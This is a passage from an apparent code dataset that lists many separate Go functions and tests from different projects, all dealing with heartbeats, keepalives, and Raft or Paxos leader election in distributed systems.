seconds), disconnecting\", peer.ServerNetworkNode.ID)\n\t\t\t\tpeer.Disconnect()\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n}", "func TestLeaderElectionReceiveMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// Replayed ViewChange message should be ignored. Idempotent.\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from self should be ignored.\n\tvc = &pb.ViewChange{NodeId: 1, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for past view should be ignored.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 0}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from node 2 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n\tif exp, a := uint64(1), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n\n\t// The rest of the ViewChange messages should be ignored.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tvc = &pb.ViewChange{NodeId: 4, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n}", "func (r *Raft) handleHeartbeat(m pb.Message) {\n\t// already check\n\t//for all role, ignore if term is less\n\tcompareRes := r.compareMsgTerm(m)\n\t//if compareRes > 0 {\n\t//\treturn\n\t//\tmsg := r.buildReject(pb.MessageType_MsgAppendResponse, m.From)\n\t//\tr.appendMsg(msg)\n\t//}\n\n\tswitch r.State {\n\tcase StateFollower:\n\t\t// handle timeout\n\t\tif compareRes < 0 {\n\t\t\t// reset state\n\t\t\tr.becomeFollower(m.Term, m.From)\n\t\t}\n\t\tr.heartbeatElapsed = 0\n\tcase StateCandidate:\n\t\tr.becomeFollower(m.Term, m.From)\n\tcase StateLeader:\n\t\tr.becomeFollower(m.Term, m.From)\n\t}\n\n\t//r.RaftLog.append(m.Entries)\n}", "func TestBroadcastChunksMsg(t *testing.T) {\n\t// suppressing annoying INFO messages\n\tlogrus.SetLevel(logrus.ErrorLevel)\n\n\tif enableProfiling {\n\t\tf, _ := os.Create(\"./cpu.prof\")\n\t\tif err := pprof.StartCPUProfile(f); err != nil {\n\t\t\tlog.Error(\"Could not start CPU profile: \", err)\n\t\t}\n\n\t\tdefer func() {\n\t\t\tpprof.StopCPUProfile()\n\n\t\t\tp := pprof.Lookup(\"mutex\")\n\t\t\tif p != nil && f != nil {\n\t\t\t\tif err := p.WriteTo(f, 0); err != nil {\n\t\t\t\t\tlog.Errorf(\"Error on writing profile name %v\", err)\n\t\t\t\t} else {\n\t\t\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\t\t\"process\": \"profile\",\n\t\t\t\t\t\t\"file\": f.Name(),\n\t\t\t\t\t}).Infof(\" profile saved\")\n\t\t\t\t}\n\t\t\t}\n\n\t\t}()\n\t}\n\n\tnodes, err := kadcast.TestNetwork(networkSize, basePort)\n\tif err != nil {\n\t\tt.Error(err)\n\t}\n\n\t// \tlog.SetLevel(log.TraceLevel)\n\tfor _, r := range nodes {\n\t\tkadcast.TraceRoutingState(r.Router)\n\t}\n\n\ttime.Sleep(3 * time.Second)\n\n\t// Broadcast Chunk message. Each of the nodes makes an attempt to broadcast\n\t// a CHUNK message to the network\n\t/*\n\t\tIf we assume constant transmission times, honest network partici-\n\t\tpants, and no packet loss in the underlying network, the propaga-\n\t\ttion method just discussed would result in an optimal broadcast\n\t\ttree. In this scenario, every node receives the block exactly once and\n\t\thence no duplicate messages would be induced by this broadcast-\n\t\ting operation.\n\t*/\n\tfor i := 0; i < len(nodes); i++ {\n\t\tlog.WithField(\"from_node\", i).Infof(\"Broadcasting a message\")\n\n\t\t// Publish topics.Kadcast with payload of a random block data to the\n\t\t// eventbus of this node. As a result, all of the network nodes should\n\t\t// have received the block only once as per beta value = 1\n\t\tblk, err := kadcastRandomBlock(nodes[i].EventBus)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tkadcast.TestReceivedMsgOnce(t, nodes, i, blk)\n\t}\n}", "func TestClientHeartbeatBadServer(t *testing.T) {\n\ttlsConfig, err := LoadTestTLSConfig(\"..\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\taddr := util.CreateTestAddr(\"tcp\")\n\t// Create a server which doesn't support heartbeats.\n\ts := &Server{\n\t\tServer: rpc.NewServer(),\n\t\ttlsConfig: tlsConfig,\n\t\taddr: addr,\n\t\tcloseCallbacks: make([]func(conn net.Conn), 0, 1),\n\t}\n\tif err := s.Start(); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Now, create a client. It should attempt a heartbeat and fail,\n\t// causing retry loop to activate.\n\tc := NewClient(s.Addr(), nil, tlsConfig)\n\tselect {\n\tcase <-c.Ready:\n\t\tt.Error(\"unexpected client heartbeat success\")\n\tcase <-c.Closed:\n\t}\n\ts.Close()\n}", "func TestSingleHeartbeatTimeout(t *testing.T) {\n\tra := NewRecoverableAction(nil)\n\treply := ra.Action(TimeConsumingAction)\n\n\tif reply == \"Recovered\" {\n\t\tt.Logf(\"Heartbeat timeout recovering OK.\")\n\t} else {\n\t\tt.Errorf(\"Heartbeat timeout recovering failed! Reply is '%v.\", reply)\n\t}\n}", "func (l *Logic) Heartbeat(c context.Context, mid int64, sn, server string) (err error) {\n\thas, err := l.dao.ExpireMapping(c, mid, sn)\n\tif err != nil {\n\t\tlog.Errorf(\"l.dao.ExpireMapping(%d,%s,%s) error(%v)\", mid, sn, server, err)\n\t\treturn\n\t}\n\tif !has {\n\t\tif err = l.dao.AddMapping(c, mid, sn, server); err != nil {\n\t\t\tlog.Errorf(\"l.dao.AddMapping(%d,%s,%s) error(%v)\", mid, sn, server, err)\n\t\t\treturn\n\t\t}\n\t}\n\tlog.Infof(\"conn heartbeat key:%s server:%s mid:%d\", sn, server, mid)\n\treturn\n}", "func StartHeartBeat() {\n\tduration := time.Duration(10) * time.Second // Pause for 10 seconds\n\n\tsendInitHeartBeat()\n\tfor true {\n\t\ttime.Sleep(duration)\n\t\tPeers.Rebalance()\n\t\tpeerMapJson, _ := Peers.PeerMapToJson()\n\t\tjsonStr := data.PrepareHeartBeatData(Peers.GetSelfId(), peerMapJson, SELF_ADDR)\n\t\tjsonString, _ := json.Marshal(jsonStr)\n\n\t\tfor key, _ := range Peers.Copy() {\n\t\t\turl := key + \"/heartbeat/receive\"\n\t\t\t_, err := http.Post(url, \"application/json\", bytes.NewBuffer(jsonString))\n\t\t\tif err != nil {\n\t\t\t\tfmt.Print(\"Error sending init message\")\n\t\t\t}\n\t\t}\n\t}\n}", "func TestKeepalive(t *testing.T) {\n\tCertFile := \"/tmp/kubeedge/certs/edge.crt\"\n\tKeyFile := \"/tmp/kubeedge/certs/edge.key\"\n\n\tmockCtrl := gomock.NewController(t)\n\tdefer mockCtrl.Finish()\n\tmockAdapter := edgehub.NewMockAdapter(mockCtrl)\n\ttests := []struct {\n\t\tname string\n\t\thub *EdgeHub\n\t}{\n\t\t{\n\t\t\tname: \"Heartbeat failure Case\",\n\t\t\thub: &EdgeHub{\n\t\t\t\tchClient: mockAdapter,\n\t\t\t\treconnectChan: make(chan struct{}),\n\t\t\t},\n\t\t},\n\t}\n\tedgeHubConfig := config.Config\n\tedgeHubConfig.TLSCertFile = CertFile\n\tedgeHubConfig.TLSPrivateKeyFile = KeyFile\n\n\tfor _, tt := range tests {\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tmockAdapter.EXPECT().Send(gomock.Any()).Return(nil).Times(1)\n\t\t\tmockAdapter.EXPECT().Send(gomock.Any()).Return(errors.New(\"Connection Refused\")).Times(1)\n\t\t\tgo tt.hub.keepalive()\n\t\t\tgot := <-tt.hub.reconnectChan\n\t\t\tif got != struct{}{} {\n\t\t\t\tt.Errorf(\"TestKeepalive() StopChan = %v, want %v\", got, struct{}{})\n\t\t\t}\n\t\t})\n\t}\n}", "func TestReceiveConsensusSetUpdate(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\tht, err := newHostDBTester(\"TestFindHostAnnouncements\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Put a host announcement into the blockchain.\n\tannouncement := encoding.Marshal(modules.HostAnnouncement{\n\t\tIPAddress: ht.gateway.Address(),\n\t})\n\ttxnBuilder := ht.wallet.StartTransaction()\n\ttxnBuilder.AddArbitraryData(append(modules.PrefixHostAnnouncement[:], announcement...))\n\ttxnSet, err := txnBuilder.Sign(true)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = ht.tpool.AcceptTransactionSet(txnSet)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Check that, prior to mining, the hostdb has no hosts.\n\tif len(ht.hostdb.AllHosts()) != 0 {\n\t\tt.Fatal(\"Hostdb should not yet have any hosts\")\n\t}\n\n\t// Mine a block to get the transaction into the consensus set.\n\tb, _ := ht.miner.FindBlock()\n\terr = ht.cs.AcceptBlock(b)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Check that there is now a host in the hostdb.\n\tif len(ht.hostdb.AllHosts()) != 1 {\n\t\tt.Fatal(\"hostdb should have a host after getting a host announcement transcation\")\n\t}\n}", "func (rs *RedisService) heartBeat() error {\n\tfield := rs.serverName\n\tconnection := rs.pool.Get()\n\tdefer connection.Close()\n\n\t_, err := connection.Do(\"HSET\", heartbeatKey, field, timestamp.NowUTC())\n\tnoticeError(err)\n\tif err != nil && err != redis.ErrNil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func TestHeartbeatKeepAlive(t *testing.T) {\n\tt.Parallel()\n\n\ttests := []struct {\n\t\tname string\n\t\tmode HeartbeatMode\n\t\tmakeServer func() types.Resource\n\t}{\n\t\t{\n\t\t\tname: \"keep alive node\",\n\t\t\tmode: HeartbeatModeNode,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.ServerV2{\n\t\t\t\t\tKind: types.KindNode,\n\t\t\t\t\tVersion: types.V2,\n\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.ServerSpecV2{\n\t\t\t\t\t\tAddr: \"127.0.0.1:1234\",\n\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"keep alive app server\",\n\t\t\tmode: HeartbeatModeApp,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.AppServerV3{\n\t\t\t\t\tKind: types.KindAppServer,\n\t\t\t\t\tVersion: types.V3,\n\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.AppServerSpecV3{\n\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"keep alive database server\",\n\t\t\tmode: HeartbeatModeDB,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.DatabaseServerV3{\n\t\t\t\t\tKind: types.KindDatabaseServer,\n\t\t\t\t\tVersion: types.V3,\n\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\tName: \"db-1\",\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.DatabaseServerSpecV3{\n\t\t\t\t\t\tDatabase: mustCreateDatabase(t, \"db-1\", defaults.ProtocolPostgres, \"127.0.0.1:1234\"),\n\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"keep alive database service\",\n\t\t\tmode: HeartbeatModeDatabaseService,\n\t\t\tmakeServer: func() types.Resource {\n\t\t\t\treturn &types.DatabaseServiceV1{\n\t\t\t\t\tResourceHeader: types.ResourceHeader{\n\t\t\t\t\t\tKind: types.KindDatabaseService,\n\t\t\t\t\t\tVersion: types.V1,\n\t\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tSpec: types.DatabaseServiceSpecV1{\n\t\t\t\t\t\tResourceMatchers: []*types.DatabaseResourceMatcher{\n\t\t\t\t\t\t\t{Labels: &types.Labels{\"env\": []string{\"prod\", \"qa\"}}},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t},\n\t\t},\n\t}\n\tfor _, tt := range tests {\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tctx, cancel := context.WithCancel(context.Background())\n\t\t\tdefer cancel()\n\t\t\tclock := clockwork.NewFakeClock()\n\t\t\tannouncer := newFakeAnnouncer(ctx)\n\n\t\t\tserver := tt.makeServer()\n\n\t\t\thb, err := NewHeartbeat(HeartbeatConfig{\n\t\t\t\tContext: ctx,\n\t\t\t\tMode: tt.mode,\n\t\t\t\tComponent: \"test\",\n\t\t\t\tAnnouncer: announcer,\n\t\t\t\tCheckPeriod: time.Second,\n\t\t\t\tAnnouncePeriod: 60 * time.Second,\n\t\t\t\tKeepAlivePeriod: 10 * time.Second,\n\t\t\t\tServerTTL: 600 * time.Second,\n\t\t\t\tClock: clock,\n\t\t\t\tGetServerInfo: func() (types.Resource, error) {\n\t\t\t\t\tserver.SetExpiry(clock.Now().UTC().Add(apidefaults.ServerAnnounceTTL))\n\t\t\t\t\treturn server, nil\n\t\t\t\t},\n\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateInit, hb.state)\n\n\t\t\t// on the first run, heartbeat will move to announce state,\n\t\t\t// will call announce right away\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateAnnounce, hb.state)\n\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, 1, announcer.upsertCalls[hb.Mode])\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, clock.Now().UTC().Add(hb.KeepAlivePeriod), hb.nextKeepAlive)\n\n\t\t\t// next call will not move to announce, because time is not up yet\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\n\t\t\t// advance time, and heartbeat will move to keep alive\n\t\t\tclock.Advance(hb.KeepAlivePeriod + time.Second)\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAlive, hb.state)\n\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Len(t, announcer.keepAlivesC, 1)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, clock.Now().UTC().Add(hb.KeepAlivePeriod), hb.nextKeepAlive)\n\n\t\t\t// update server info, system should switch to announce state\n\t\t\tserver = tt.makeServer()\n\t\t\tserver.SetName(\"2\")\n\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateAnnounce, hb.state)\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, clock.Now().UTC().Add(hb.KeepAlivePeriod), hb.nextKeepAlive)\n\n\t\t\t// in case of any error while sending keep alive, system should fail\n\t\t\t// and go back to init state\n\t\t\tannouncer.keepAlivesC = make(chan types.KeepAlive)\n\t\t\tannouncer.err = trace.ConnectionProblem(nil, \"ooops\")\n\t\t\tannouncer.Close()\n\t\t\tclock.Advance(hb.KeepAlivePeriod + time.Second)\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAlive, hb.state)\n\t\t\terr = hb.announce()\n\t\t\trequire.Error(t, err)\n\t\t\trequire.IsType(t, announcer.err, err)\n\t\t\trequire.Equal(t, HeartbeatStateInit, hb.state)\n\t\t\trequire.Equal(t, 2, announcer.upsertCalls[hb.Mode])\n\n\t\t\t// on the next run, system will try to reannounce\n\t\t\tannouncer.err = nil\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateAnnounce, hb.state)\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, HeartbeatStateKeepAliveWait, hb.state)\n\t\t\trequire.Equal(t, 3, announcer.upsertCalls[hb.Mode])\n\t\t})\n\t}\n}", "func (ooc *MockOpenoltClient) HeartbeatCheck(ctx context.Context, in *openolt.Empty, opts ...grpc.CallOption) (*openolt.Heartbeat, error) {\n\treturn nil, nil\n}", "func (hb *Heartbeat) Beat() {\n\thb.timer.Reset(time.Duration(atomic.LoadInt64(&hb.timeout)))\n}", "func (s steps) onBeat(beat int) bool {\n\treturn s[beat] != 0\n}", "func SendHeartbeat(){\n\n\tfor{\n\t/*\t\n\t\trandNum := rand.Intn(100) \n\t\tif randNum > 97 && r.id == r.clusterConfig.LeaderId { \n\t\t\t//r.clusterConfig.Servers[r.id].isLeader=2\t\t\t//break ThisLoop \n\t\t\ttime.Sleep(100 * time.Second)\n\t\t\t}\n\t*/\n\t\tselect{\n\t\t\t\n\t\t\tcase <-raft.C1:\n\t\t\t\t//log.Println(\"in send SendHeartbeat-Append\")\n\t\t\t\n\t\t\tcase <-raft.C2:\n\t\t\t\t//log.Println(\"in send SendHeartbeat-commit\")\n\t\t\t\n\t\t\tcase <-time.After(100*time.Millisecond):\n\t\t\t\tif r.clusterConfig.Servers[r.id].isLeader == 1 {\n\t\t\t\t\tfor i:=0; i<N; i++ {\n\t\t\t\t\t\t\tif i == r.id { continue }\t\t\t\t\n\t\t\t\t\t\t\targs := &HeartbeatRPCArgs{r.id,r.currentTerm}\t\t\t\t\n\t\t\t\t\t\t\tvar reply string\t\t\t\t\n\t\t\t\t\t\t\tvar err error = nil\n\t\t\t\t\t\t\trr := make(chan error, 1)\n\t\t\t\t\t\t\tgo func() { rr <- r.clusterConfig.Servers[i].Client.Call(\"RPC.HeartbeatRPC\", args, &reply) } ()\n\t\t\t\t\t\t\tselect{\n\t\t\t\t\t\t\t\tcase err = <-rr:\n\t\t\t\t\t\t\t\t\tif err != nil {\t\n\t\t\t\t\t\t\t\t\t\tlog.Println(\"[Server] HeartbeatRPC Error:\", err) \n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\tcase <-time.After(20*time.Millisecond):\n\t\t\t\t\t\t\t\t//\tlog.Println(\"Heartbeat reply not got \",i)\n\t\t\t\t\t\t\t\t\tcontinue //log.Println(\"Heartbeat reply not got \",i)\n\t\t\t\t\t\t\t}// inner select loop\n\t\t\t\t\t}//end of inner for \n\t\t\t\t}//end of if\n\t\t}//end of select\n\t}//end of for loop\n}", "func sendHeartbeat(cache *cache.Cache) {\n\tvar routeTable []string\n\n\t(*cache).RWMutex.RLock()\n\tfor node := range *cache.RouteTable {\n\t\trouteTable = append(routeTable, node)\n\t}\n\t(*cache).RWMutex.RUnlock()\n\n\tfor _, node := range routeTable {\n\t\tsplit := strings.Split(node, \":\")\n\t\tip := split[0]\n\t\tport, _ := strconv.Atoi(split[1])\n\t\theartbeatPort := port + 1024\n\t\tmonitorAddr := ip + \":\" + strconv.Itoa(heartbeatPort)\n\t\tlocalAddr := (*cache).Config.Address\n\n\t\ttcpAddr, err := net.ResolveTCPAddr(\"tcp\", monitorAddr)\n\t\tif err != nil {\n\t\t\t(*cache).RWMutex.Lock()\n\t\t\t(*cache.RouteTable)[node] = false\n\t\t\t(*cache).RWMutex.Unlock()\n\t\t\tcontinue\n\t\t}\n\n\t\tconn, err := net.DialTCP(\"tcp\", nil, tcpAddr)\n\t\tif err != nil {\n\t\t\t(*cache).RWMutex.Lock()\n\t\t\t(*cache.RouteTable)[node] = false\n\t\t\t(*cache).RWMutex.Unlock()\n\t\t\tcontinue\n\t\t}\n\t\tdefer (*conn).Close()\n\n\t\trequest := fmt.Sprintf(\"*2\\r\\n$4\\r\\nPING\\r\\n$%d\\r\\n%s\\r\\n\", len(localAddr), localAddr)\n\t\t_, err = conn.Write([]byte(request))\n\t\tif err != nil {\n\t\t\t(*cache).RWMutex.Lock()\n\t\t\t(*cache.RouteTable)[node] = false\n\t\t\t(*cache).RWMutex.Unlock()\n\t\t\tcontinue\n\t\t}\n\n\t\treply := make([]byte, heartbeatPackageSize)\n\t\treader := bufio.NewReader(conn)\n\n\t\t_, err = reader.Read(reply)\n\t\tcommand, _ := protocol.Parser(string(reply))\n\t\tif err != nil {\n\t\t\t(*cache).RWMutex.Lock()\n\t\t\t(*cache.RouteTable)[node] = false\n\t\t\t(*cache).RWMutex.Unlock()\n\t\t\tcontinue\n\t\t}\n\n\t\tif command.Args[0] == \"PONG\" {\n\t\t\t(*cache).RWMutex.Lock()\n\t\t\t(*cache.RouteTable)[node] = true\n\t\t\t(*cache).RWMutex.Unlock()\n\t\t\tcontinue\n\t\t} else if command.Args[0] == \"Deny heartbeat\" {\n\t\t\tlogger.Warning.Printf(command.Args[0]+\" by %s\", node)\n\n\t\t\t// Join cluster\n\t\t\tjoinAddr, err := net.ResolveTCPAddr(\"tcp\", node)\n\t\t\tjoinConn, err := net.DialTCP(\"tcp\", nil, joinAddr)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tdefer joinConn.Close()\n\n\t\t\tjoinRequest := fmt.Sprintf(\"*2\\r\\n$4\\r\\nJOIN\\r\\n$%d\\r\\n%s\\r\\n\", len(localAddr), localAddr)\n\t\t\t_, err = joinConn.Write([]byte(joinRequest))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tlogger.Info.Printf(\"Send join cluster request to %s\", node)\n\t\t\tjoinReply := make([]byte, heartbeatPackageSize)\n\t\t\treader := bufio.NewReader(joinConn)\n\n\t\t\t_, err = reader.Read(joinReply)\n\t\t\tcommand, _ := protocol.Parser(string(joinReply))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif command.Args[0] == \"OK\" {\n\t\t\t\tlogger.Info.Printf(\"Receive route table infomation from cluster, and update it\")\n\t\t\t\tfor index := 1; index < len(command.Args); index++ {\n\t\t\t\t\t(*cache).RWMutex.Lock()\n\t\t\t\t\t(*cache.RouteTable)[command.Args[index]] = false\n\t\t\t\t\t(*cache).RWMutex.Unlock()\n\t\t\t\t}\n\t\t\t\t// TODO print route table\n\n\t\t\t} else if command.Args[0] == \"FAIL\" {\n\t\t\t\t// TODO\n\t\t\t}\n\t\t}\n\t}\n}", "func (sb *StatusBeater) Beat(status int64, description string, publish func(event beat.Event)) {\n\tnow := time.Now().UnixNano()\n\tmsg := Heartbeat{\n\t\tServiceName: sb.Name,\n\t\tServiceVersion: sb.Version,\n\t\tTime: timestamp.Timestamp{\n\t\t\tSeconds: now / time.Nanosecond.Nanoseconds(),\n\t\t},\n\t\tStatus: Status{\n\t\t\tCode: status,\n\t\t\tDescription: description,\n\t\t},\n\t}\n\tmsgJSON, err := json.Marshal(msg)\n\tif err != nil {\n\t\tlogp.Warn(\"internal heartbeat message json conversion failed %s\", err)\n\t\treturn\n\t}\n\tsb.PublishEvent(msgJSON, publish)\n\n}", "func (a *RPC) HeartbeatRPC(args *HeartbeatRPCArgs, reply *string) error {\n\n\traft.ElectionTimer_ch <- args.LeaderId\n\tr.clusterConfig.Servers[args.LeaderId].isLeader=1\n\tr.clusterConfig.LeaderId=args.LeaderId\t\t\n\t*reply = \"ACK \"\n\t//log.Print(r.id ,\"got HeartbeatRPC \",\" from \",args.LeaderId)\n\treturn nil\n}", "func createBeat(localip string) message {\n\tid := createMyId(localip)\n\treturn message{\"beat\", \"\", id}\n}", "func (c *ci) HeartBeats() {\n\tc.heartbeats++\n\tlog.Printf(\"daemon.heartbeat:%v\", c.heartbeats)\n\tfor _, j := range c.jobs {\n\t\tj.Run() // I don't need to fork here, because Run() already handles that.\n\t}\n}", "func (or OnionRouter) sendHeartBeat() {\n\tvar ignoredResp bool // there is no response for this RPC call\n\terr := or.dirServer.Call(\"DServer.KeepNodeOnline\", or.addr, &ignoredResp)\n\tutil.HandleFatalError(\"Could not send heartbeat to directory server\", err)\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func (rf *Raft) BeLeader() {\n\tif rf.state != Candidate {\n\t\treturn\n\t}\n\trf.state = Leader\n\trf.nextIndex = make([]int, len(rf.peers))\n\trf.matchIndex = make([]int, len(rf.peers))\n\n\tfor i := range rf.nextIndex {\n\t\trf.nextIndex[i] = rf.GetLastLogIndex() + 1\n\t}\n}", "func TestMultipleHeartbeatTimeout(t *testing.T) {\n\ts := NewSupervisor(nil)\n\traa := NewRecoverableAction(s)\n\trab := NewRecoverableAction(s)\n\trac := NewRecoverableAction(s)\n\n\ts.AddRecoverable(\"A\", raa)\n\ts.AddRecoverable(\"B\", rab)\n\ts.AddRecoverable(\"C\", rac)\n\n\tt.Logf(\"(A) is '%v'.\", raa.Action(TimeConsumingAction))\n\tt.Logf(\"(B) is '%v'.\", rab.Action(PositiveAction))\n\tt.Logf(\"(C) is '%v'.\", rac.Action(PositiveAction))\n}", "func main() {\n\t// Local (127.0.0.1) hardcoded IPs to simplify testing.\n\tlocalIpPort := \"127.0.0.1:8080\"\n\tvar lostMsgThresh uint8 = 3\n\n\t// TODO: generate a new random epoch nonce on each run\n\tvar epochNonce uint64 = 12345\n\tvar chCapacity uint8 = 5\n\n\n\tfd, notifyCh, err := fdlib.Initialize(epochNonce, chCapacity)\n\tif common.CheckError(err) != nil {\n\t\treturn\n\t}\n\n\t// Stop monitoring and stop responding on exit.\n\t// Defers are really cool, check out: https://blog.golang.org/defer-panic-and-recover\n\tdefer fd.StopMonitoring()\n\t//defer fd.StopResponding()\n\n\terr = fd.StartResponding(localIpPort)\n\tif common.CheckError(err) != nil {\n\t\treturn\n\t}\n\n\tfmt.Println(\"Started responding to heartbeats.\")\n\n\t// Add a monitor for a 